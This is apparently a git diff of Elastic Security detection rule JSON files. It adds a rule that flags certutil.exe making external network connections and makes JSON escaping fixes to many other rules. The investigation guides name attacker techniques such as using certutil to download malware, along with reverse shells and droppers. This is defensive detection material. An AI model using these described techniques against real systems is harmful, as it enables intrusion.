entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_109.json b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_109.json new file mode 100644 index 00000000000..e0fc51e59c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3838e0e3-1850-4850-a411-2e8c5ba40ba8_109.json @@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Certutil", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + "https://frsecure.com/malware-incident-response-playbook/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json index a91834d3a34..bcdc63f95e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_102.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json index 2845bd85c3f..1d44a889f08 100644 --- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json +++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_103.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json index 106f69a33ed..455d34b1245 100644 --- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json +++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json index a838dd5b266..e61cf6bbfd0 100644 --- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json +++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json @@ -47,7 +47,7 @@ ], "risk_score": 73, "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json index 04cac8527d6..9e0f69257a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json +++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json index 30bbbb8312b..67efeaeb607 100644 --- a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json +++ b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json index b890b29a4f8..2f7f039e3cd 100644 --- a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json index ccd63a215a3..e4a37023188 100644 --- a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json index 97a5ef70228..95e7f4818da 100644 --- a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json index ca2ec1f2a9a..9d35276da43 100644 --- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json index 4bfdcd6969d..f3455693530 100644 --- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json index d7a73fcdee7..583aa1186a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json index 812ca21de2a..cb310a2d4bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json +++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json b/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json index d19aa5de544..c2ba70ec961 100644 --- a/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json +++ b/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Downloaded Shortcut Files", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"lnk\" and file.Ext.windows.zone_identifier \u003e 1\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"lnk\" and file.Ext.windows.zone_identifier > 1\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json index 2cb0b19a1f5..5721d81d12e 100644 --- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json index 78c3478c5ca..13b48024f90 100644 --- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json index fec9a057074..ece45004993 